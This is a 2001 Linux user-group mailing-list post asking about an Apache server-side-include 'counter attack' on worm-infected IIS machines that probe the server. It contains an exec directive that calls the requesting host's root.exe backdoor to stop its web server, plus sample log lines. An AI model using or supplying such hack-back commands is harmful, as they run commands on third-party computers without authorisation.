[NTLUG:Discuss] nimba counter attack without PHP?
Richard Geoffrion
richard at rain.lewisville.tx.us
Wed Sep 19 19:53:07 CDT 2001
so then adding
AddType text/html .ida
AddHandler server-parsed .ida
to the httpd.conf file...and including
<!--#exec cmd="lynx -source
http://$REMOTE_ADDR/scripts/root.exe?/c+iisreset+/stop"-->
is all I can do?
you know...How do I verify that it is working...because I continue to see
hits to the default.ida file on my webserver that come from the same IP
address. for example
<log snip mode=truncated>
64.232.230.115 - - [30/Aug/2001:13:13:23 -0500] "GET /default.ida?
64.232.230.115 - - [30/Aug/2001:13:29:01 -0500] "GET /default.ida?
</log snip>
So what...did the server reset and 15 minutes later decide to hit me again?
oh what I wouldn't give for an infected Microsoft server so that I could do
some tests. UG.
More information about the Discuss
mailing list